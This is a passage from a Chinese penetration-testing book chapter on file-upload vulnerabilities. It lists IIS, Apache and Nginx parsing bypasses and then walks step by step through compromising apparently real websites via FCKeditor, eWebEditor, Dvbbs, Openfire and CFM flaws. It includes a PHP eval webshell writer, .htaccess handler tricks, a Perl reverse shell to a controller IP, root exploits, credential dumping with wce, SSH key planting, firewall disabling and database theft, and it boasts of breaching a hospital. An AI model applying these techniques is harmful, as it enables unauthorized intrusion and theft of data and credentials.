Web服務(wù)器滲透實戰(zhàn)：常見文件上傳漏洞及利用

常見文件上傳漏洞及利用第一節(jié)文件上傳及解析漏洞第二節(jié)利用FCKeditor漏洞滲透某Linux服務(wù)器第三節(jié)eWebEditor漏洞滲透某網(wǎng)站第四節(jié)口令及上傳文件獲取某網(wǎng)站服務(wù)器權(quán)限第五節(jié)Dvbbs8.2插件上傳漏洞利用第六節(jié)Openfire后臺插件上傳獲取?Webshell第七節(jié)利用CFM上傳漏洞滲透某服務(wù)器第八節(jié)通過修改IWMS后臺系統(tǒng)設(shè)置獲取Webshell第九節(jié)使用BurpSuite抓包上傳Webshell第十節(jié)密碼繞過獲取某站點Webshell

第一節(jié)文件上傳及解析漏洞

6.1.1文件上傳的危害在Web滲透過程中，文件上傳漏洞的危害是眾所周知的，通過文件上傳可以上傳Webshell，進(jìn)而可以控制服務(wù)器。6.1.2文件解析漏洞介紹文件解析漏洞主要是一些特殊文件被IIS、Apache、Nginx等服務(wù)在某種情況下解釋成腳本文件格式并得以執(zhí)行而產(chǎn)生的漏洞。6.1.3IIS5.x/6.0解析漏洞IIS6.0解析漏洞主要有以下三種：1．目錄解析漏洞/xx.asp/xx.jpg在網(wǎng)站下創(chuàng)建文件夾名字為.asp、.asa的文件夾，其目錄內(nèi)的任何擴(kuò)展名的文件都會被IIS當(dāng)做asp文件來解析并執(zhí)行。因此攻擊者可以通過該漏洞直接上傳圖片木馬，并且不需要改后綴名。2．文件解析xx.asp;.jpg在IIS6.0下，分號后面的擴(kuò)展名不被解析，所以xx.asp;.jpg被解析為asp腳本得以執(zhí)行。3．文件類型解析asa/cer/cdxIIS6.0默認(rèn)的可執(zhí)行文件除了asp文件還包含asa、cer、cdx這三種文件。6.1.4Apache解析漏洞Apache對文件的解析主要是從右到左開始判斷并進(jìn)行解析的，如果判斷該文件為不能解析的類型，則繼續(xù)向左進(jìn)行解析，如xx.php.wer.xxxxx將被解析為PHP類型的文件。6.1.5IIS7.0/Nginx<8.03畸形解析漏洞在默認(rèn)Fastcgi開啟狀況下上傳名字為xx.jpg，內(nèi)容如下：<?PHPfputs(fopen('shell.php','w'),'<?phpeval($_POST[cmd])?>');?>然后訪問xx.jpg/.php，在這個目錄下就會生成一句話木馬shell.php。6.1.6Nginx<8.03空字節(jié)代碼執(zhí)行漏洞Nginx的0.5.,0.6.,0.7≤0.7.65版本和0.8≤0.8.37版本在使用PHP-Fastcgi執(zhí)行php的時候，URL里面在遇到%00空字節(jié)時與Fastcgi處理不一致，可以在圖片中嵌入PHP代碼然后通過訪問xxx.jpg%00.php來執(zhí)行其中的代碼。另一種Nginx文件漏洞是從左到右進(jìn)行解析的，既可繞過對后綴名的限制，又可上傳木馬文件，因此可以上傳xxx.jpg.php(可能是運氣的原因，也可能是代碼本身存在的問題，但在其他都不能成功的條件下可以試試)。內(nèi)容如下：Content-Disposition:form-data;name="userfiles";filename="XXX.jpg.php"6.1.7htaccess文件解析如果在Apache中.htaccess可被執(zhí)行并上傳，那么可以嘗試在.htaccess中寫入：<FilesMatch"shell.jpg">SetHandlerapplication/x-httpd-php</FilesMatch>然后再上傳包含一句話木馬代碼的shell.jpg的文件，這樣shell.jpg就可被解析為PHP文件了。6.1.8操作系統(tǒng)特性解析由于Windows系統(tǒng)會將文件后綴中的空格和點進(jìn)行過濾，如果遇到黑名單校驗，如不允許上傳PHP文件，而系統(tǒng)又是Windows系統(tǒng)，那么可以上傳xx.php或xx.php.，通過這種方式就可以繞過黑名單校驗進(jìn)行文件上傳。6.1.9前端上傳限制有的網(wǎng)站由于對文件上傳只做前端的校驗，導(dǎo)致攻擊者可以輕易繞過校驗，因為前端的一切限制都是不安全的。圖6-1所示是一個對前端進(jìn)行校驗的一個上傳測試點。這里通過開啟BurpSuite進(jìn)行抓包，但是一點擊上傳就會提示無法上傳，而BurpSuite未抓到任何數(shù)據(jù)包，說明這是一個前端校驗的上傳，在這里通過禁用js來直接上傳PHP的Webshell，也可以先將PHP的Webshell進(jìn)行后綴名更改，如更改為jpg，然后上傳，通過BurpSuite抓包后發(fā)往repeater中進(jìn)行測試，如圖6-2所示。此時再將上傳的文件更改為原本的后綴名php，即可成功上傳，如圖6-3所示。6.1.10文件頭欺騙漏洞在一句話木馬前面加入GIF89a，然后將木馬保存為圖片格式，可以欺騙簡單的WAF。6.1.11從左到右檢測在上傳文件的時候，也遇到過服務(wù)器是從左到右進(jìn)行解析的漏洞，也就是說服務(wù)器只檢查文件名的第一個后綴，如果滿足驗證要求即可成功上傳。但是眾所周知，只有最后一層的后綴才是有效的，如1.jpg.php，那么真正的后綴應(yīng)該是php，根據(jù)這個漏洞可繞過相關(guān)驗證上傳Webshell。6.1.12filepath漏洞filepath漏洞一般用來突破服務(wù)器自動命名規(guī)則，有以下兩種利用方式：(1)改變文件上傳后路徑(filepath)，可以結(jié)合目錄解析漏洞，路徑?/x.asp/。(2)直接改變文件名稱(都是在filepath下進(jìn)行修改)，路徑?/x.asp;。第一種方式使用較多，圖6-4所示是一個上傳測試頁面。使用BurpSuite進(jìn)行抓包并發(fā)往Repeater，此時上傳是不成功的，而請求的包頭文件里面顯示了上傳后的目錄，可在此目錄下新增一個eth10.php的目錄，然后將filename改為圖片格式，如jpg，但是如果直接這樣上傳還是不成功，可以在新建的目錄后面使用00截斷來進(jìn)行上傳，如圖6-6所示。用第二種方式可以在原目錄下新建一個eth10.php文件，然后直接使用00截斷，這樣依舊可以上傳php文件，因為上傳是使用filepath以及filename來控制的，將這個文件加入filename白名單后就可以用filepath進(jìn)行上傳。上傳方法和第一種一樣，唯一的區(qū)別是在00截斷前不加最后一個斜杠(?/?)。6.1.1300截斷00截斷有以下兩種利用方式：(1)更改filename，如xx.php.jpg，在BurpSuite中將空格對應(yīng)的hex20改為00。(2)更改filename，如xx.php%00.jpg，在BurpSuite中將?%00進(jìn)行右鍵轉(zhuǎn)換?-url-urldecoder。6.1.14filetype漏洞filetype漏洞主要是針對content-type字段，主要有兩種利用方式：(1)先上傳一個圖片，然后將content-type:images/jpeg改為content-type:text/asp，然后對filename進(jìn)行00截斷，將圖片內(nèi)容替換為一句話木馬。(2)直接使用BurpSuite抓包，得到Post上傳數(shù)據(jù)后，將Content-Type:text/plain改成

Content-Type:image/gif。6.1.15iconv函數(shù)限制上傳如果某天發(fā)現(xiàn)無論上傳什么文件，上傳后的文件都會自動添加一個?.jpg后綴，那么可以懷疑是否是使用iconv這個函數(shù)進(jìn)行了上傳的限制。此時可以使用類似00截斷的方法，但這時使用的不是00截斷，而是80-EF截斷，也就是說可以修改HEX為80到EF中的值來進(jìn)行截斷，如上傳一個xx.php，然后截斷抓包將后面的空格對應(yīng)的十六進(jìn)制改為80到EF中的任意一個。6.1.16雙文件上傳在文件上傳的地方，右鍵點擊審查元素，首先修改action為完整路徑，然后復(fù)制粘貼上傳瀏覽文件(<input)，這樣就會出現(xiàn)兩個上傳框，第一個上傳正常文件，第二個選擇一句話木馬，然后提交。6.1.17表單提交按鈕有時掃描上傳路徑會發(fā)現(xiàn)只有一個瀏覽文件頁面，卻沒有提交按鈕，此時就需要寫入提交按鈕。寫入表單：使用快捷鍵F12審查元素，在選擇文件表單下面添加提交按鈕代碼，代碼如下：<inputtype="submit"value="提交"name="xx">

第二節(jié)利用FCKeditor漏洞滲透某Linux服務(wù)器6.2.1對已有Webshell進(jìn)行分析和研究1.搜索Webshell關(guān)鍵字Jsp的Webshell主要有JShell、JFold和JspFilebrowser三種，除此之外還有單獨所謂的“CMD”型的JSP后門，它的主要功能是執(zhí)行類似CMD的命令。我們利用Google搜索“阿呆JSPWebshell”時出來一個網(wǎng)頁，如圖6-7所示，根據(jù)經(jīng)驗我們可以知道第一條搜索記錄就是一個Webshell地址。2.驗證Webshell直接打開第一條搜索記錄，獲取真實的網(wǎng)站地址：/?UserFiles/?Image/IMG20090817235411840.jsp”打開該地址后能夠正常運行，如圖6-8所示，可以嘗試輸入一些常見的通用密碼進(jìn)行登錄，但未能成功，說明該Webshell使用的是自己的密碼。3.分析Webshell打開一個Webshell后我們的第一感覺是該網(wǎng)站肯定存在漏洞，入侵者有可能修復(fù)過也可能未修復(fù)漏洞，從地址來看該網(wǎng)站使用的很像是FCKeditor，我們可以直接在網(wǎng)站地址后加上“FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=?connectors/jsp/connector”并跳轉(zhuǎn)前往，如圖6-9所示，直接打開了熟悉的FCKeditor上傳頁面。4.上傳Webshell在FCKeditor中單擊瀏覽按鈕直接選擇一個Jsp的Webshell文件，然后單擊“Upload”上傳，如圖6-11所示，上傳成功。6.2.2測試上傳的Webshell由于FCKeditor的典型目錄結(jié)構(gòu)為“UserFiles/Image/”，因此上傳的Webshell地址可以使用“UserFiles/Image(File或Flash)/+文件名稱”，在本例中是上傳到Flash文件目錄，因此實際地址為“/UserFiles/Flash/Browser.jsp”，如圖6-12所示，Webshell能夠正常運行，此時就可以利用Webshell進(jìn)行下載、上傳、刪除、復(fù)制以及執(zhí)行命令等操作。6.2.3對Webshell所在服務(wù)器進(jìn)行信息收集與分析1．獲取服務(wù)器類型在獲取Webshell后可以通過它來執(zhí)行命令，查看服務(wù)器的配置情況，如圖6-13所示，通過瀏覽文件目錄可以知道該服務(wù)器為Linux服務(wù)器。2．下載網(wǎng)站源代碼與數(shù)據(jù)通過滲透能夠快速提高個人攻防能力，在滲透成功后下載網(wǎng)站源代碼與數(shù)據(jù)到本地進(jìn)行分析，取長補(bǔ)短學(xué)習(xí)他人長處，快速積累經(jīng)驗。在本例中通過查看該服務(wù)器下的“var/mysqlbak”目錄，獲取了該網(wǎng)站的數(shù)據(jù)庫MySQL備份文件，如圖6-14所示，通過Webshell可以下載單獨的文件，也可以打包下載整個網(wǎng)站的文件。3．獲取他人的Webshell密碼他人的Webshell是本次滲透的目標(biāo)，通過Webshell的地址去反過來查看文件的實際地址，使用cat命令查看其登錄密碼：cathome/webhome//?WEB-INF/?webapps/?ROOT/UserFiles/Image/?IMG200908jsp如圖6-15所示，獲取其密碼為“191903***”。6.2.4服務(wù)器提權(quán)1．查看Linux版本在Webshell中直接執(zhí)行“uname-a”命令來查看Linux版本，結(jié)果顯示為“Linux.tw2.6.9-11.ELsmp#1SMPFriMay2018:26:27EDT2005i686i686i386GNU/Linux”，如圖6-16所示。2．查看操作系統(tǒng)發(fā)行版本“cat/etc/issue”命令主要用來顯示操作系統(tǒng)發(fā)行版本等信息，用戶可以定制issue，也就是說可以手動修改，如果未修改則默認(rèn)顯示各個操作系統(tǒng)發(fā)行版本的信息，如圖6-17所示。3．反彈回shell將反彈腳本c.pl上傳到路徑“/var/tmp”，然后在控守計算機(jī)上執(zhí)行“nc-vv-l-p53”，然后再在該Webshell中執(zhí)行“perl/var/tmp/c.pl202.102.xxx.xxx53”，如圖6-18所示。4．嘗試提權(quán)通過Webshell上傳最新的sendpage3漏洞利用程序，上傳成功后，在反彈的shell中查看上傳的程序，然后直接執(zhí)行“./run”命令，如圖6-20所示，直接提權(quán)為Root用戶權(quán)限。6.2.5FCKeditor編輯器漏洞總結(jié)本案例通過FCKeditor漏洞成功獲取Webshell后，通過查看Linux版本和操作系統(tǒng)的發(fā)行版本等信息，上傳相應(yīng)的漏洞利用程序，通過在反彈的終端執(zhí)行exploit而獲得系統(tǒng)的最高權(quán)限。1.?FCKeditor重要信息收集(1)?FCKeditor編輯器頁：FCKeditor/_samples/default.html(2)查看編輯器版本：FCKeditor/_whatsnew.html(3)查看文件上傳路徑：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/2.?FCKeditor被動限制策略所導(dǎo)致的過濾不嚴(yán)問題3.利用Windows2003路徑解析漏洞上傳網(wǎng)頁木馬4．FCKeditorPHP上傳任意文件漏洞5．Type自定義參數(shù)變量任意上傳文件漏洞6.?aspx版FCKeditor新聞組件遍歷目錄漏洞7.?FCKeditor中Webshell其他的上傳方式8.?FCKeditor文件上傳“.”變“_”的繞過方法9.“.htaccess”文件圖片上傳

第三節(jié)eWebEditor漏洞滲透某網(wǎng)站6.3.1基本信息收集及獲取后臺管理權(quán)限1.?eWebEditor重要信息(1)默認(rèn)后臺地址：/ewebeditor/admin_login.asp。(2)默認(rèn)數(shù)據(jù)庫路徑：[PATH]/db/ewebeditor.mdb、[PATH]/db/db.mdb、[PATH]?/?db?/?%23ewebeditor.mdb。(3)使用默認(rèn)賬戶和密碼admin/admin888或admin/admin進(jìn)入后臺，也可嘗試admin/123456，如果使用簡單的賬戶和密碼不行，可以嘗試?yán)肂urpSuite等工具進(jìn)行密碼暴力破解進(jìn)入后臺。(4)后臺樣式管理獲取Webshell。(5)當(dāng)數(shù)據(jù)庫被管理員修改為asp或asa格式的時候，可以插入一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫，然后利用一句話木馬客戶端連接拿下Webshell。2.獲取后臺登錄地址獲取后臺登錄地址通常有三種方法。第一種是通過SQL注入等掃描工具進(jìn)行掃描獲??；第二種是根據(jù)個人經(jīng)驗進(jìn)行猜測；第三種是特殊類型的后臺地址，這種后臺地址沒有任何規(guī)律可循，怎么復(fù)雜就怎么構(gòu)造，對這種網(wǎng)站可以通過旁注或者在同網(wǎng)段服務(wù)器，也可以通過系統(tǒng)設(shè)計的邏輯漏洞進(jìn)行嗅探。在本例中通過測試獲取后臺地址為“http://034.748239.com/post/admin”，如圖6-21所示，成功獲取后臺登錄地址。3.進(jìn)入后臺使用賬號“admin”，密碼“admin888”進(jìn)入后臺，如圖6-22所示。6.3.2漏洞分析及利用1.分析網(wǎng)站源代碼(1)通過查看網(wǎng)站使用的模板以及樣式表等特征信息，判斷該網(wǎng)站使用了SouthidcEditor，并通過掃描獲取了其詳細(xì)的編輯器地址。(2)下載其默認(rèn)的mdb數(shù)據(jù)庫，并對其密碼進(jìn)行破解，獲取其賬號對應(yīng)的密碼，使用該密碼進(jìn)行登錄，成功進(jìn)入后臺，如圖6-23所示。2.對樣式表進(jìn)行修改單擊“樣式管理”，在其中新建一個樣式名稱“112”，并在允許上傳文件類型及文件大小設(shè)置中添加“|asp|cer|asasp”類型，如圖6-24所示。3.使用上傳漏洞進(jìn)行上傳將以下代碼保存為htm文件并打開，如圖6-25所示，上傳一個asp的木馬文件。4.獲取上傳文件具體地址在管理菜單中單擊“上傳文件管理”，選擇樣式目錄“112”，如圖6-26所示6.3.3獲取Webshell權(quán)限及信息擴(kuò)展收集1.獲取Webshell使用中國菜刀管理工具連接該Webshell地址，成功獲取Webshell，如圖6-27所示。2.信息擴(kuò)展(1)獲取QQ賬號信息。(2)獲取Ftp賬號信息。(3)詐騙關(guān)鍵字。通過對網(wǎng)站代碼進(jìn)行分析，發(fā)現(xiàn)詐騙網(wǎng)站會在首頁添加諸如“網(wǎng)上安全管理下載1”、“網(wǎng)上安全管理下載2”、“網(wǎng)上安全管理下載3”、“網(wǎng)上偵查系統(tǒng)”和“遠(yuǎn)程安全協(xié)助”等關(guān)鍵字，誘使用戶下載“檢察院安全管理軟件.exe”、“檢察院安全控件.exe”、“簡易IIS服務(wù)器.exe”、“網(wǎng)絡(luò)安全控件.zip”等遠(yuǎn)程控制軟件，或者誘導(dǎo)用戶訪問指定的網(wǎng)站地址，對用戶進(jìn)行銀行賬號及密碼的盜取，從而進(jìn)行詐騙活動。(4)使用工具軟件對正規(guī)網(wǎng)站進(jìn)行鏡像仿冒。6.3.4滲透及eWebEditor編輯器漏洞總結(jié)1．SouthidcEditor網(wǎng)站編輯器漏洞2．SouthidcEditor數(shù)據(jù)庫下載地址3．eWebEditor遍歷路徑漏洞4．利用eWebEditorsession欺騙漏洞進(jìn)入后臺5．eWebEditor2.7.0注入漏洞6．eWebEditorv6.0.0上傳漏洞7．eWebEditorPHP/ASP后臺通殺漏洞8．eWebEditorNetupload.aspx上傳漏洞

第四節(jié)口令及上傳文件獲取某網(wǎng)站

服務(wù)器權(quán)限6.4.1尋找后臺地址思路在滲透過程中，通過掃描有可能未能發(fā)現(xiàn)前臺存在SQL注入等漏洞，或者因為漏洞掃描軟件本身的限制，未能掃描到網(wǎng)站所有的文件或找到的可利用的漏洞有限，這時就需要獲取后臺地址，通過后臺來尋求突破，后臺地址尋找思路如下：(1)默認(rèn)后臺地址。一般是網(wǎng)站名稱?+?后臺名稱。(2)通過掃描器掃描獲取后臺地址。(3)網(wǎng)站直接提供后臺地址。(4)專用系統(tǒng)的一些后臺地址。(5)通過Google、百度等搜索引擎來搜索登錄、系統(tǒng)管理等關(guān)鍵字來尋找后臺地址。(6)某些PHP程序，其后臺地址為index.php/Admin/Login/index.html。(7)從根目錄admin.php/admin.aspx/admin.asp/admin.jsp直接進(jìn)后臺。(8)其他情況。6.4.2后臺口令獲取后臺地址對于某些官方類的站點，先可以嘗試admin/admin、admin/admin888、admin/123456等弱口令登錄后臺；如果在登錄時沒有提示輸入驗證碼，則可以通過BurpSuite進(jìn)行后臺密碼暴力破解。本次測試首先找到后臺地址，如圖6-30所示，然后使用弱口令admin/123456成功登錄系統(tǒng)。6.4.3獲取Webshell1.尋找上傳地址成功登錄后臺后，尋找上傳地址思路如下：(1)去查看文章發(fā)表及公告發(fā)布的地方，這些地方一定會存在編輯器。(2)去查看附件管理，比如Dedecms附件管理可以直接上傳文件和編輯文件。(3)去查看附件上傳的地方，有的網(wǎng)站有單獨附件上傳地點。(4)去查看網(wǎng)站輪換圖片地址，有的網(wǎng)站有單獨圖片處理地址，可以在此上傳文件。(5)去查看網(wǎng)站功能設(shè)置處，可以直接修改上傳文件的類型，也可以添加網(wǎng)站支持的類型。在本例中有一個圖片新聞，如圖6-31所示，其中圖片跟編輯器是分開的，這種情況極有可能可以直接上傳腳本文件從而獲取Webshell。也就是說這個地方可以進(jìn)行構(gòu)造和修改。2.直接上傳文件測試單擊選擇文件，在其中直接選擇一個PHP的Webshell，如圖6-32所示，并進(jìn)行上傳，順利上傳后，右鍵單擊獲取圖片的地址，或者查看源代碼來獲取Webshell的真實地址，如圖6-33所示，成功獲取Webshell。6.4.4服務(wù)器提權(quán)1.獲取服務(wù)器密碼通過Webshell的命令執(zhí)行功能查看當(dāng)前用戶的權(quán)限，如圖6-34所示，執(zhí)行whoami命令后顯示為system權(quán)限，說明PHP給的權(quán)限為系統(tǒng)權(quán)限，不用提權(quán)，可以通過上傳wce等程序來獲取當(dāng)前登錄用戶的明文密碼或者通過網(wǎng)站在線查詢系統(tǒng)密碼。上傳wce32和wce64程序到C盤根目錄，通過dirwce*?命令查看上傳的文件是否存在及是否被系統(tǒng)殺毒軟件查殺，然后執(zhí)行wce32.rar-w命令，注意這里不是wce32.exe，可執(zhí)行文件后綴雖然不是exe，但仍然當(dāng)作exe來執(zhí)行，順利獲取當(dāng)前管理員密碼“7788919aA”。2.成功登錄服務(wù)器使用遠(yuǎn)程終端直接登錄該服務(wù)器，如圖6-36所示，成功登錄，通過查看IP地址，發(fā)現(xiàn)該服務(wù)器配置有內(nèi)網(wǎng)IP。6.4.5總結(jié)與思考(1)通過尋找文件上傳模塊，在該模塊中可以先測試能否直接上傳PHP的Webshell，在某些情況下，程序員未對上傳文件進(jìn)行檢測，因此可以直接獲取Webshell，這是文件上傳漏洞中的一個特例。(2)后續(xù)在該網(wǎng)站又發(fā)現(xiàn)了目錄信息泄露以及數(shù)據(jù)泄露，在存在漏洞的網(wǎng)站中發(fā)現(xiàn)漏洞后，漏洞就會越找越多。

第五節(jié)Dvbbs8.2插件上傳漏洞利用6.5.1Dvbbs8.2插件上傳漏洞利用研究1.使用Google搜索2.注冊用戶隨機(jī)選取一個論壇，打開論壇后直奔注冊頁面，如圖6-38所示，按照要求進(jìn)行注冊。3.修改樣式使用注冊好的用戶登錄論壇成功后，單擊論壇工具欄上的“我的主頁”，進(jìn)入個人主頁配置，然后點擊“個人空間管理”標(biāo)簽，在基本設(shè)置中給現(xiàn)有的“空間標(biāo)題”和“簡介說明”隨便起一個名字，如圖6-39所示，然后點擊“保存設(shè)置”按扭，接下來，單擊“自定義風(fēng)格”按鈕，在“樣式風(fēng)格CSS修改”里任意輸入幾個字符，如圖6-40所示，然后單擊“保存設(shè)置”完成修改。4.無上傳界面在“個人空間管理”中單擊“自定義風(fēng)格”，然后再單擊“文件管理”按扭，接著就會彈出一個風(fēng)格模板的文件管理新窗口了，如圖6-41所示，然而在本次滲透中雖然出現(xiàn)了文件管理頁面，但并未出現(xiàn)上傳界面，說明管理員或者前期滲透人員刪除了上傳功能模塊，只能放棄，重新再選擇一個目標(biāo)進(jìn)行滲透。5.成功上傳文件重新找了十多個論壇進(jìn)行測試，終于測試成功了一個，如圖6-42所示，選擇一個一句話木馬文件，將文件名稱命名為“1.asp;1.jpg”，然后直接上傳即可，上傳成功后頁面會自動刷新，如果無殺毒軟件或者其他防范措施，一般都會出現(xiàn)剛才上傳的一句話木馬，且作為圖片格式的木馬不會顯示出來。6.5.2獲取Webshell1.使用一句話客戶端進(jìn)行連接使用lake2EvalClient進(jìn)行連接，在“TheURL”中輸入圖片的詳細(xì)地址，在“Password”中輸入一句話木馬的連接密碼，在本例中密碼是“cmd”，然后在“Function”(功能)中選擇一個模塊，如圖6-43所示，單擊“Send”，即可查看具體執(zhí)行效果，顯示磁盤情況如圖6-44所示。2.獲取網(wǎng)站的物理路徑在功能模塊中選擇“ServerVariable”獲取服務(wù)器和客戶的一些基本信息，如圖6-45所示，獲取一句話木馬的具體路徑為“F:\www\\bbs\skins\myspace\userskins\skin_14\”；接著通過上傳功能上傳一個大馬到服務(wù)器，輸入密碼后如圖6-46所示。3.提權(quán)失敗使用Serv-u以及FTP提權(quán)均告失敗，后面對服務(wù)器端口進(jìn)行掃描，發(fā)現(xiàn)服務(wù)器關(guān)閉了21端口和43958端口，如圖6-47所示。4.查找并下載數(shù)據(jù)庫在站點根目錄中查找數(shù)據(jù)庫配置腳本文件，如圖6-48所示，本例中數(shù)據(jù)庫配置連接文件為conn.asp，直接打開并獲取數(shù)據(jù)庫的相對路徑“\database\unfgsa#szht.mdb”。由于在該數(shù)據(jù)庫名稱中使用了“#”號，因此使用瀏覽器下載的文件僅為1k，也就是說下載失敗，對于這類文件有兩個辦法進(jìn)行下載：(1)直接使用Webshell中的復(fù)制功能，將文件重新命名為可以下載的文件。(2)使用“%23”代替“#”進(jìn)行下載，如圖6-49所示，更換后可以將數(shù)據(jù)庫文件下載到本地。6.5.3Dvbbs8.2滲透思路與防范措施1.滲透思路(1)下載Dvbbs8.2版本的database和boke的默認(rèn)地址：data/Dvbbs8.mdb和boke/data/Dvboke.mdb。下載后通過查詢破解16位的md5密碼進(jìn)入后臺。(2)利用IIS圖片上傳漏洞，本節(jié)中的插件上傳漏洞本質(zhì)上屬于IIS文件解析漏洞。(3)修改文件上傳類型，使其支持服務(wù)器平臺的腳本并上傳。如果平臺支持PHP/JSP/A，那么可以上傳平臺支持的木馬，然后獲取Webshell。2.防范措施(1)?Dvbbs安裝完畢后一定要修改默認(rèn)數(shù)據(jù)庫名稱，同時去掉無用的txt文件和“PoweredByDvbbs8.2”標(biāo)示。(2)后臺密碼設(shè)置強(qiáng)度高一些。即使下載了數(shù)據(jù)庫，攻擊者如果沒有破解密碼便無能為力。(3)謹(jǐn)慎使用插件和功能強(qiáng)大的模塊，使用時盡量使用最小權(quán)限。(4)把上傳圖片的目錄的腳本執(zhí)行權(quán)限去掉，或者暫時將文件管理的上傳模塊去掉。(5)規(guī)范上傳腳本的代碼，校驗上傳圖片和文件的代碼段，或者在論壇后臺把上傳功能關(guān)閉。

第六節(jié)Openfire后臺插件上傳獲取

?Webshell6.6.1選定攻擊目標(biāo)如果在實際網(wǎng)絡(luò)掃描過程中發(fā)現(xiàn)存在Openfire便可以跳過下面的步驟，在進(jìn)行滲透學(xué)習(xí)時可以利用fofa.so和Shadon等搜索引擎來排除或篩選目標(biāo)IP等信息，以獲取符合攻擊特征的目標(biāo)IP或站點。1.目標(biāo)獲取2.暴力破解或者使用弱口令登錄系統(tǒng)一般的弱口令有admin/admin、admin/admin888、admin/123456，如果在嘗試登錄時這些弱口令無法登錄請直接使用BurpSuite進(jìn)行暴力破解進(jìn)行登錄。對于能夠正常訪問的網(wǎng)站，可以嘗試登錄，如圖6-51所示，Openfire可能使用的不是默認(rèn)端口。6.6.2獲取后臺權(quán)限輸入正確密碼后進(jìn)入后臺，如圖6-52所示，可以查看服務(wù)器設(shè)置、用戶/用戶群、會話、分組聊天以及插件等信息。6.6.3上傳插件并獲取Webshell1.查看并上傳插件單擊插件，在其中可以看到所有的插件列表，在上傳插件欄中單擊上傳插件，選擇專門生成的帶Webshell的Openfire插件，如圖6-53所示。在本次測試中，從互聯(lián)網(wǎng)收集了兩個漏洞插件利用代碼，如圖6-54所示，均成功上傳。2.獲取Webshell(1)?helloworld插件獲取Webshell。單擊服務(wù)器—服務(wù)器設(shè)置，如果上傳helloworld插件并運行成功，在配置文件下面會生成一個用戶接口設(shè)置鏈接，單擊該鏈接即可獲取Webshell，如圖6-56所示。(2)?broadcast插件獲取Webshell。如圖6-57和圖6-58所示，獲取broadcast的Webshell并查看當(dāng)前用戶權(quán)限為root。6.6.4免root密碼登錄服務(wù)器雖然通過Webshell可以獲取/etc/shadow文件，但該root及其他用戶的密碼不是那么容易被破解的。我們可以在服務(wù)器上面用SSH來嘗試能否利用公私鑰來解決訪問問題。1.在服務(wù)器上監(jiān)聽端口2.反彈shell到控守服務(wù)器3.實際操作流程(1)遠(yuǎn)程服務(wù)器生成公私鑰。(2)本地Linux上生成公私鑰。(3)將本地公鑰上傳到遠(yuǎn)程服務(wù)器上并生成authorized_keys。(4)刪除多余文件。(5)登錄服務(wù)器。使用命令“sshroot@1xx.1xx.111.1xx”登錄服務(wù)器，不用輸入遠(yuǎn)程服務(wù)器的密碼也能達(dá)到完美登錄服務(wù)器的目的，如圖6-61所示。6.6.5總結(jié)與思考(1)?Openfire需要獲取管理員賬號和密碼，目前通殺所有版本。Openfire的最新版本為4.1.5。(2)可以通過BurpSuite對admin管理員賬號進(jìn)行暴力破解。(3)使用Openfire安全加固，可以使用強(qiáng)密碼，同時嚴(yán)格設(shè)置插件權(quán)限，建議除了必需的插件目錄外，禁用新創(chuàng)建目錄。(4)使用本節(jié)所講的方法，成功獲取國內(nèi)某著名醫(yī)院網(wǎng)絡(luò)的入口權(quán)限。

第七節(jié)利用CFM上傳漏洞滲透某服務(wù)器6.7.1獲取后臺權(quán)限1.手工查找和自動掃描漏洞2.獲取管理員用戶名稱和密碼雖然獲取的SQL注入漏洞無法利用pangolin進(jìn)行滲透測試，但可以使用啊D注入工具對該注入點進(jìn)行猜測，如圖6-63所示，獲取該數(shù)據(jù)庫為“****_nqcontent”，用戶名稱為“nqcontent”，數(shù)據(jù)庫權(quán)限為“db_owner”，根據(jù)SQL注入的一般步驟順利地獲取了有關(guān)管理員的用戶名和密碼。3.進(jìn)入后臺使用獲取的用戶名和密碼成功登錄系統(tǒng)，如圖6-64所示，通過查看后臺的各個功能模塊，發(fā)現(xiàn)在“AssetManagement”中有上傳(Upload)模塊。6.7.2服務(wù)器提權(quán)1.獲取Webshell通過測試了解到該上傳模塊允許上傳CFM以及圖片文件，上傳一個CFM的命令并執(zhí)行Webshell，如圖6-65所示，上傳后可以成功運行，且用戶權(quán)限較高可以執(zhí)行命令。2.關(guān)閉防火墻通過停用防火墻(netstopSharedaccess)或添加允許端口來繞過防火墻，如圖6-66所示。3.成功登錄3389在本地執(zhí)行命令“l(fā)cx-listen33892008”，將3389端口重定向到本地的2008端口，運行mstsc后使用“:2008”進(jìn)行連接，輸入添加的管理員用戶名和密碼，成功進(jìn)入系統(tǒng)，如圖6-67所示。6.7.3內(nèi)網(wǎng)滲透1.收集服務(wù)器信息通過查看發(fā)現(xiàn)服務(wù)器還支持PHP，通過CFM后門上傳了一個PHP的Webshell，如圖6-68所示，獲取了該服務(wù)器的配置參數(shù)信息。通過Webshell獲取了WordPress的數(shù)據(jù)庫配置信息，再通過Webshell將WordPress的管理員數(shù)據(jù)庫導(dǎo)出到本地，如圖6-69所示。2.滲透Mail服務(wù)器6.7.4總結(jié)與思考(1)很多服務(wù)器都部署在虛擬機(jī)上面，滲透成功的也僅僅是虛擬機(jī)，虛擬機(jī)上的業(yè)務(wù)系統(tǒng)遭到破壞后可以快速恢復(fù)。由于硬件的支持，同一個硬件服務(wù)器可能部署了多個虛擬應(yīng)用服務(wù)器。(2)針對CFM的滲透完全可以先使用Jsky進(jìn)行掃描，找到漏洞后再通過啊D注入工具來猜測數(shù)據(jù)。CFM平臺的滲透還可以通過手動方式來判斷和猜測。(3)?CFM平臺上傳CFM的Webshell后，其分配的權(quán)限很高，可以快速提權(quán)。(4)在具有一定權(quán)限的情況下可以使用命令“netstopsharedaccess”來停用Windows自帶的防火墻，進(jìn)而通過lcx轉(zhuǎn)發(fā)端口來登錄被滲透的內(nèi)網(wǎng)服務(wù)器。

